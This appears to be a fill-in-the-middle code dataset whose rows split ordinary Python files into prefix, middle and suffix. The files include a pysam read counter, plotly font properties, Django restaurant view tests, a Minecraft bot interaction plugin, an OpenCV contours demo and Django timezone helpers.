prefix stringlengths 0 918k | middle stringlengths 0 812k | suffix stringlengths 0 962k |
|---|---|---|
"""compute number of reads/alignments from BAM file
===================================================
This is a benchmarking utility script with limited functionality.
Compute simple flag stats on a BAM-file using
the pysam python interface.
"""
import sys
import pysam
assert len(sys.argv) == 2, "USAGE: | {} filename.bam".format(sys.argv[0])
is_paired = 0
is_proper = 0
for read in pysam.AlignmentFile(sys.argv[1], "rb"):
is_paired += read.is_paired
is_proper += read.is_proper_pair
print ("there are alignments of %i paired reads" % is_paired)
print ("th | ere are %i proper paired alignments" % is_proper)
|
rty
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on Chart Studio Cloud for color .
The 'colorsrc' property | must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# | family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The Chart Studio Cloud (at https://chart-
studio.plotly.com or on-premise) generates images on a server,
where only a select number of fonts are installed and
supported. These include "Arial", "Balto", "Courier New",
"Droid Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on Chart Studio Cloud for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on Chart Studio Cloud for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on Chart Studio Cloud for
color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud for
family .
size
sizesrc
Sets the source reference on Chart Studio Cloud for
size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Font object
Sets the font used in hover labels.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.scatterternary
.hoverlabel.Font`
color
colorsrc
Sets the source reference on Chart Studio Cloud for
color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) |
SF2SF_run1(),
'HMM2MM_run1': HMM2MM_run1(),
'HFF2FF_run1': HFF2FF_run1(),
'HS2S_run2': HS2S_run2(),
'HM2M_run2': HM2M_run2(),
'HF2F_run2': HF2F_run2(),
'HSM2SM_run2': HSM2SM_run2(),
'HSF2SF_run2': HSF2SF_run2(),
'HMM2MM_run2': HMM2MM_run2(),
'HFF2FF_run2': HFF2FF_run2(),
'HS2S_run3': HS2S_run3(),
'HM2M_run3': HM2M_run3(),
'HF2F_run3': HF2F_run3(),
'HSM2SM_run3': HSM2SM_run3(),
'HSF2SF_run3': HSF2SF_run3(),
'HMM2MM_run3': HMM2MM_run3(),
'HFF2FF_run3': HFF2FF_run3(),
'HS2S_run4': HS2S_run4(),
'HM2M_run4': HM2M_run4(),
'HF2F_run4': HF2F_run4(),
'HSM2SM_run4': HSM2SM_run4(),
'HSF2SF_run4': HSF2SF_run4(),
'HMM2MM_run4': HMM2MM_run4(),
'HFF2FF_run4': HFF2FF_run4()}
self.backwardPatterns = { 'HS2S_run1': None,
'HM2M_run1': None,
'HF2F_run1': None,
'HSM2SM_run1': [Matcher(HSM2SMBackS2S_run1LHS()),Matcher(HSM2SMBackM2M_run1LHS())],
'HSF2SF_run1': [Matcher(HSF2SFBackS2S_run1LHS()),Matcher(HSF2SFBackF2F_run1LHS())],
'HMM2MM_run1': [Matcher(HMM2MMBackM2M1_run1LHS()),Matcher(HMM2MMBackM2M2_run1LHS())],
'HFF2FF_run1': [Matcher(HFF2FFBackF2F1_run1LHS()),Matcher(HFF2FFBackF2F2_run1LHS())],
'HS2S_run2': None,
'HM2M_run2': None,
'HF2F_run2': None,
'HSM2SM_run2': [Matcher(HSM2SMBackS2S_run2LHS()),Matcher(HSM2SMBackM2M_run2LHS())],
'HSF2SF_run2': [Matcher(HSF2SFBackS2S_run2LHS()),Matcher(HSF2SFBackF2F_run2LHS())],
'HMM2MM_run2': [Matcher(HMM2MMBackM2M1_run2LHS()),Matcher(HMM2MMBackM2M2_run2LHS())],
'HFF2FF_run2': [Matcher(HFF2FFBackF2F1_run2LHS()),Matcher(HFF2FFBackF2F2_run2LHS())],
'HS2S_run3': None,
'HM2M_run3': None,
'HF2F_run3': None,
'HSM2SM_run3': [Matcher(HSM2SMBackS2S_run3LHS()),Matcher(HSM2SMBackM2M_run3LHS())],
'HSF2SF_run3': [Matcher(HSF2SFBackS2S_run3LHS()),Matcher(HSF2SFBackF2F_run3LHS())],
'HMM2MM_run3': [Matcher(HMM2MMBackM2M1_run3LHS()),Matcher(HMM2MMBackM2M2_run3LHS())],
'HFF2FF_run3': [Matcher(HFF2FFBackF2F1_run3LHS()),Matcher(HFF2FFBackF2F2_run3LHS())],
'HS2S_run4': None,
'HM2M_run4': None,
'HF2F_run4': None,
'HSM2SM_run4': [Matcher(HSM2SMBackS2S_run4LHS()),Matcher(HSM2SMBackM2M_run4LHS())],
'HSF2SF_run4': [Matcher(HSF2SFBackS2S_run4LHS()),Matcher(HSF2SFBackF2F_run4LHS())],
'HMM2MM_run4': [Matcher(HMM2MMBackM2M1_run4LHS()),Matcher(HMM2MMBackM2M2_run4LHS())],
'HFF2FF_run4': [Matcher(HFF2FFBackF2F1_run4LHS()),Matcher(HFF2FFBackF2F2_run4LHS())]}
self.backwardPatterns2Rules = { 'HSM2SMBackS2S_run1LHS': 'HSM2SM_run1',
'HSM2SMBackM2M_run1LHS': 'HSM2SM_run1',
'HSF2SFBackS2S_run1LHS': 'HSF2SF_run1',
'HSF2SFBackF2F_run1LHS': 'HSF2SF_run1',
'HMM2MMBackM2M1_run1LHS': 'HMM2MM_run1',
'HMM2MMBackM2M2_run1LHS': 'HMM2MM_run1',
'HFF2FFBackF2F1_run1LHS': 'HFF2FF_run1',
'HFF2FFBackF2F2_run1LHS': 'HFF2FF_run1',
'HSM2SMBackS2S_run2LHS': 'HSM2SM_run2',
'HSM2SMBackM2M_run2LHS': 'HSM2SM_run2',
'HSF2SFBackS2S_run2LHS': 'HSF2SF_run2',
'HSF2SFBackF2F_run2LHS': 'HSF2SF_run2',
'HMM2MMBackM2M1_run2LHS': 'HMM2MM_run2',
'HMM2MMBackM2M2_run2LHS': 'HMM2MM_run2',
'HFF2FFBackF2F1_run2LHS': 'HFF2FF_run2',
'HFF2FFBackF2F2_run2LHS': 'HFF2FF_run2',
'HSM2SMBackS2S_run3LHS': 'HSM2SM_run3',
'HSM2SMBackM2M_run3LHS': 'HSM2SM_run3',
'HSF2SFBackS2S_run3LHS': 'HSF2SF_run3',
'HSF2SFBackF2F_run3LHS': 'HSF2SF_run3',
'HMM2MMBackM2M1_run3LHS': 'HMM2MM_run3',
'HMM2MMBackM2M2_run3LHS': 'HMM2MM_run3',
'HFF2FFBackF2F1_run3LHS': 'HFF2FF_run3',
'HFF2FFBackF2F2_run3LHS': 'HFF2FF_run3',
'HSM2SMBackS2S_run4LHS': 'HSM2SM_run4',
'HSM2SMBackM2M_run4LHS': 'HSM2SM_run4',
'HSF2SFBackS2S_run4LHS': ' | HSF2SF_run4',
'HSF2SFBackF2F_run4LHS': 'HSF2SF_run4',
'HMM2MMBackM2M1_run4LHS': 'HMM2MM_run4',
'HMM2MM | BackM2M2_run4LHS': 'HMM2MM_run4',
'HFF2FFBackF2F1_run4LHS': 'HFF2FF_run4',
'HFF2FFBackF2F2_run4LHS': 'HFF2FF_run4'}
self.backwardPatternsComplete = {
'HS2S_run1': None,
'HM2M_run1': None,
'HF2F_run1': None,
'HSM2SM_run1': [Matcher(HSM2SMBackComplete_run1LHS())],
'HSF2SF_run1': [Matcher(HSF2SFBackComplete_run1LHS())],
'HMM2MM_run1': [Matcher(HMM2MMBackComplete_run1LHS())],
'HFF2FF_run1': [Matcher(HFF2FFBackComplete_run1LHS())],
'HS2S_run2': None,
'HM2M_run2': None,
'HF2F_run2': None,
'HSM2SM_run2': [Matcher(HSM2SMBackComplete_run2LHS())],
|
uerysetEqual(response.context['restaurant_list'], [
'<Restaurant: Test Restaurant>'])
def test_two_restaurants(self):
""" If two Restaurant exists both should be displayed in the index page
"""
create_restaurant("Test Restaurant 1")
create_restaurant("Test Restaurant 2")
response = self.client.get(reverse('webapp:index'))
self.assertQuerysetEqual(response.context['restaurant_list'],
['<R | estaurant: Test Restaurant 2>',
'<Restaurant: Test Restaurant 1>']
)
class DetailViewTests(TestCase):
def test_no_restaurant(self):
""" If restaurant with given id is not found message
Restaurant doesnot exists should be shown to user
"""
response = self.client.get(reverse('webapp:detail', args=(1,)), follow=True)
messages = response.context['messages']
message = ""
for m in messages:
message = m.message
self.assertEqual(message, "R | estaurant doesnot exists..")
def test_with_restaurant(self):
""" If restaurant exists restaurant details must shown in detail page
"""
restaurant = create_restaurant("Test Restaurant")
response = self.client.get(
reverse('webapp:detail', args=(restaurant.id,)))
self.assertEqual(
response.context['restaurant'].name, 'Test Restaurant')
class SearchViewTests(TestCase):
def test_search_view_with_get_request(self):
""" GET request to search page should redirect to listing page
and show all the listings of restaurants
"""
response = self.client.get(reverse('webapp:search'))
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
def test_search_view_with_post_request(self):
""" POST request to search page should redirect to listing page
and show the lists of restaurant matching the search item
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=(search_text,)))
def test_search_view_with_empty_data_request(self):
""" POST request to search page with empty string should redirect to listing page
and show the all lists of restaurant
"""
create_restaurant("Test Restaurant")
search_text = ""
response = self.client.post(reverse('webapp:search'), {'search_field':search_text})
self.assertRedirects(response, reverse('webapp:search_listing', args=("all",)))
class SearchViewListingTests(TestCase):
def test_no_matching_content(self):
""" If search content doesnot match the restaurant name or type
or restaurant doesnot exists, appropriate message should be shown
"""
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], [])
def test_name_matching_with_search_text(self):
""" If search content match with the restaurant name
that restaurant should be shown in the list
"""
create_restaurant("Test Restaurant")
search_text = "test"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_type_matching_with_search_text(self):
""" If search content match with the restaurant type
that restaurant should be shown in the list
"""
restaurant = create_restaurant("Test Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Test Restaurant>'])
def test_name_and_type_matching_with_search_text(self):
""" If search content matches the restaurant name and type
only one result of the matching restaurant should be shown
"""
restaurant = create_restaurant("Diner Restaurant")
restaurant.types.create(name="Diner")
search_text = "diner"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant>'])
def test_search_list_pagination_with_given_pagenumber(self):
""" If page number is given as parameter then search list should
show that page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 2
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
def test_search_list_pagination_with_noninteger_pagenumber(self):
""" If non integer page number is given as parameter then search list should
show the first page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = "two"
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 1>','<Restaurant: Diner Restaurant 2>'])
def test_search_list_pagination_with_nonexisting_pagenumber(self):
""" If non existing page number is given as parameter then search list should
show the last page with the corresponding content
"""
r1 = create_restaurant("Diner Restaurant 1")
r2 = create_restaurant("Diner Restaurant 2")
r3 = create_restaurant("Diner Restaurant 3")
r4 = create_restaurant("Diner Restaurant 4")
restaurant_type = Type.objects.create(name="Diner")
restaurant_type.restaurant_set.add(r1, r2, r3, r4)
search_text = "diner"
page = 5
response = self.client.get(reverse('webapp:search_listing', args=(search_text,)) + "?page="+str(page))
self.assertEqual(response.status_code, 200)
self.assertQuerysetEqual(response.context['search_list'], ['<Restaurant: Diner Restaurant 3>','<Restaurant: Diner Restaurant 4>'])
class RestaurantCreateViewTests(TestCase):
def test_view_loads(self):
""" View should be loaded for GET request
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.get(reverse('webapp:restaurant_create'))
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, 'webapp/restaurant_form.html')
def test_view_fails_blank(self):
""" Validation error should be shown if posted with blank data
"""
create_owner('Test User', 'test@example.com', 'testpwd')
self.client.login(username='Test User', password='testpwd')
response = self.client.post(reverse('webapp:restaurant_create'), {})
self.assertFormError(response, 'form', 'name', 'This field is required.')
def test_view_fail |
import string
from TagObject import TagObject
from BaseResource impo | rt BaseResource
import gettext
_ = gettext.gettext
TAG_NAME = "apache"
RESOURCE_TYPE = _("Apache Server")
class Apache(BaseResource):
def __init__(self):
BaseResource.__init__(s | elf)
self.TAG_NAME = TAG_NAME
self.resource_type = RESOURCE_TYPE
|
res = ('ClientInfo', 'Inventory', 'Net', 'Channels')
def __init__(self, ploader, settings):
super(InteractPlugin, self).__init__(ploader, settings)
ploader.provides('Interact', self)
self.sneaking = False
self.sprinting = False
self.dig_pos_dict = {'x': 0, 'y': 0, 'z': 0}
self.auto_swing = True # move arm when clicking
self.auto_look = True # look at clicked things
def swing_arm(self):
self.net.push_packet('PLAY>Animation', {})
def _entity_action(self, action, jump_boost=100):
entity_id = self.clientinfo.eid
self.net.push_packet('PLAY>Entity Action', {
'eid': entity_id,
'action': action,
'jump_boost': jump_boost,
})
def leave_bed(self):
self._entity_action(constants.ENTITY_ACTION_LEAVE_BED)
def sneak(self, sneak=True):
self._entity_action(constants.ENTITY_ACTION_SNEAK
if sneak else constants.ENTITY_ACTION_UNSNEAK)
self.sneaking = sneak
def unsneak(self):
self.sneak(False)
def sprint(self, sprint=True):
self._entity_action(constants.ENTITY_ACTION_START_SPRINT if sprint
else constants.ENTITY_ACTION_STOP_SPRINT)
self.sprinting = sprint
def unsprint(self):
self.sprint(False)
def jump_horse(self, jump_boost=100):
self._entity_action(constants.ENTITY_ACTION_JUMP_HORSE, jump_boost)
def open_inventory(self):
self._entity_action(constants.ENTITY_ACTION_OPEN_INVENTORY)
def look(self, yaw=0.0, pitch=0.0):
"""
Turn the head. Both angles are in degrees.
"""
self.clientinfo.position.pitch = pitch
self.clientinfo.position.yaw = yaw
def look_rel(self, d_yaw=0.0, d_pitch=0.0):
self.look(self.clientinfo.position.yaw + d_yaw,
self.clientinfo.position.pitch + d_pitch)
def look_at_rel(self, delta):
self.look(*delta.yaw_pitch)
def look_at(self, pos):
delta = pos - self.clientinfo.position
delta.y -= constants.PLAYER_HEIGHT
if delta.x or delta.z:
self.look_at_rel(delta)
else:
self.look(self.clientinfo.position.yaw, delta.yaw_pitch.pitch)
def _send_dig_block(self, status, pos=None, face=constants.FACE_Y_POS):
if status == constants.DIG_START:
self.dig_pos_dict = pos.get_dict().copy()
self.net.push_packet('PLAY>Player Digging', {
'status': status,
'location': self.dig_pos_dict,
'face': face,
})
def start_digging(self, pos):
if self.auto_look:
self.look_at(pos) # TODO look at block center
self._send_dig_block(constants.DIG_START, pos)
if self.auto_swing:
self.swing_arm()
# TODO send swing animation until done or stopped
def cancel_digging(self):
self._send_dig_block(constants.DIG_CANCEL)
def finish_digging(self):
self._send_dig_block(constants.DIG_FINISH)
def dig_block(self, pos):
"""
Not cancelable.
"""
self.start_digging(pos)
self.finish_digging()
def _send_click_block(self, pos, face=1, cursor_pos=Vector3(8, 8, 8)):
self.net.push_packet('PLAY>Player Block Placement', {
'location': pos.get_dict(),
'direction': face,
'held_item': self.inventory.active_slot.get_dict(),
'cur_pos_x': int(cursor_pos.x),
'cur_pos_y': int(cursor_pos.y),
'cur_pos_z': int(cursor_pos.z),
})
def click_block(self, pos, face=1, cursor_pos=Vector3(8, 8, 8),
look_at_block=True, swing=True):
"""
Click on a block.
Examples: push button, open window, make redstone ore glow
Args:
face (int): side of the block on which the block is placed on
cursor_pos (Vector3): where to click inside the block,
each dimension 0-15
"""
if look_at_block and self.auto_look:
# TODO look at cursor_pos
self.look_at(pos)
self._send_click_block(pos, face, cursor_pos)
if swing and self.auto_swing:
self.swing_arm()
def place_block(self, pos, face=1, cursor_pos=Vector3(8, 8, 8),
sneak=True, look_at_block=True, swing=True):
"""
Place a block next to ``pos``.
If the block at ``pos | `` is air, place at ``pos``.
"""
sneaking_before = self.sneaking
if sneak:
self.sneak()
self.click_block(pos, fa | ce, cursor_pos, look_at_block, swing)
if sneak:
self.sneak(sneaking_before)
def use_bucket(self, pos): # TODO
"""
Using buckets is different from placing blocks.
See "Special note on using buckets"
in http://wiki.vg/Protocol#Player_Block_Placement
"""
raise NotImplementedError(self.use_bucket.__doc__)
def activate_item(self):
"""
Use (hold right-click) the item in the active slot.
Examples: pull the bow, start eating once, throw an egg.
"""
self._send_click_block(pos=Vector3(-1, 255, -1),
face=-1,
cursor_pos=Vector3(-1, -1, -1))
def deactivate_item(self):
"""
Stop using (release right-click) the item in the active slot.
Examples: shoot the bow, stop eating.
"""
self._send_dig_block(constants.DIG_DEACTIVATE_ITEM)
def use_entity(self, entity, cursor_pos=None,
action=constants.INTERACT_ENTITY):
"""
Uses (right-click) an entity to open its window.
Setting ``cursor_pos`` sets ``action`` to "interact at".
"""
if self.auto_look:
self.look_at(Vector3(entity)) # TODO look at cursor_pos
if cursor_pos is not None:
action = constants.INTERACT_ENTITY_AT
packet = {'target': entity.eid, 'action': action}
if action == constants.INTERACT_ENTITY_AT:
packet['target_x'] = cursor_pos.x
packet['target_y'] = cursor_pos.y
packet['target_z'] = cursor_pos.z
self.net.push_packet('PLAY>Use Entity', packet)
if self.auto_swing:
self.swing_arm()
def attack_entity(self, entity):
self.use_entity(entity, action=constants.ATTACK_ENTITY)
def mount_vehicle(self, entity):
self.use_entity(entity)
def steer_vehicle(self, sideways=0.0, forward=0.0,
jump=False, unmount=False):
flags = 0
if jump:
flags += 1
if unmount:
flags += 2
self.net.push_packet('PLAY>Steer Vehicle', {
'sideways': sideways,
'forward': forward,
'flags': flags,
})
def unmount_vehicle(self):
self.steer_vehicle(unmount=True)
def jump_vehicle(self):
self.steer_vehicle(jump=True)
def write_book(self, text, author="", title="", sign=False):
"""Write text to the current book in hand, optionally sign the book"""
book = self._setup_book()
if book is None:
return False
pages = (text[0+i:constants.BOOK_CHARS_PER_PAGE+i]
for i in range(0, len(text), constants.BOOK_CHARS_PER_PAGE))
self.edit_book(pages)
if sign:
self.sign_book(author, title)
def edit_book(self, pages):
"""Set the pages of current book in hand"""
book = self._setup_book()
if book is None:
return False
nbtpages = nbt.TagList(nbt.TagString)
for i, page in enumerate(pages):
if i >= constants.BOOK_MAXPAGES:
break
nbtpages.insert(i, nbt.TagString(page))
book.nbt["pages"] = nbtpages
self.channels.send("MC|BEdit", self._pack_book(book))
def sign_book(self, author, title):
"""Sign current book in hand"""
book = self._setup_book()
if book is None:
|
"""
Examp | le of module documentation which can be
multiple-lined
"""
from sqlalchemy import Column, Integer, String
from wopmars.Base import Base
class FooBaseH(Base):
"""
Documentation for the class
"""
|
__tablename__ = "FooBaseH"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(255))
state = Column(String)
__mapper_args__ = {
'polymorphic_on': state,
'polymorphic_identity': "1"
}
|
#!/usr/bin/env python
'''
This program illustrates the use of findContours and drawContours.
The original image is put up along with the image of drawn contours.
Usage:
contours.py
A trackbar is put up which controls the contour level from -3 to 3
'''
# Python 2/3 compatibility
fro | m __future__ import print_function
import sys
PY3 = sys.version_info[0] == 3
if PY3:
xrange = range
import numpy as np
import cv2
def make_image():
img = np.zeros((500, 500), np.uint8)
black, white = 0, 255
for i in xrange(6):
dx = int((i%2)*250 - 30)
| dy = int((i/2.)*150)
if i == 0:
for j in xrange(11):
angle = (j+5)*np.pi/21
c, s = np.cos(angle), np.sin(angle)
x1, y1 = np.int32([dx+100+j*10-80*c, dy+100-90*s])
x2, y2 = np.int32([dx+100+j*10-30*c, dy+100-30*s])
cv2.line(img, (x1, y1), (x2, y2), white)
cv2.ellipse( img, (dx+150, dy+100), (100,70), 0, 0, 360, white, -1 )
cv2.ellipse( img, (dx+115, dy+70), (30,20), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+185, dy+70), (30,20), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+115, dy+70), (15,15), 0, 0, 360, white, -1 )
cv2.ellipse( img, (dx+185, dy+70), (15,15), 0, 0, 360, white, -1 )
cv2.ellipse( img, (dx+115, dy+70), (5,5), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+185, dy+70), (5,5), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+150, dy+100), (10,5), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+150, dy+150), (40,10), 0, 0, 360, black, -1 )
cv2.ellipse( img, (dx+27, dy+100), (20,35), 0, 0, 360, white, -1 )
cv2.ellipse( img, (dx+273, dy+100), (20,35), 0, 0, 360, white, -1 )
return img
if __name__ == '__main__':
print(__doc__)
img = make_image()
h, w = img.shape[:2]
_, contours0, hierarchy = cv2.findContours( img.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = [cv2.approxPolyDP(cnt, 3, True) for cnt in contours0]
def update(levels):
vis = np.zeros((h, w, 3), np.uint8)
levels = levels - 3
cv2.drawContours( vis, contours, (-1, 2)[levels <= 0], (128,255,255),
3, cv2.LINE_AA, hierarchy, abs(levels) )
cv2.imshow('contours', vis)
update(3)
cv2.createTrackbar( "levels+3", "contours", 3, 7, update )
cv2.imshow('image', img)
cv2.waitKey()
cv2.destroyAllWindows()
|
_time
try:
import pytz
except ImportError:
pytz = None
from django.conf import settings
from django.utils import six
__all__ = [
'utc',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local tim | e zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time implementation taken from Python's docs.
Used only when pytz isn't available, an | d most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept identical to the reference version. Subclasses contain improvements.
"""
def __init__(self):
# This code is moved in __init__ to execute it as late as possible
# See get_default_timezone().
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def __repr__(self):
return "<LocalTimezone>"
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
# In order to avoid accessing the settings at compile time,
# wrap the expression in a function and cache the result.
_localtime = None
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
See also :func:`get_current_timezone`.
"""
global _localtime
if _localtime is None:
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
_localtime = pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
_localtime = LocalTimezone()
return _localtime
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
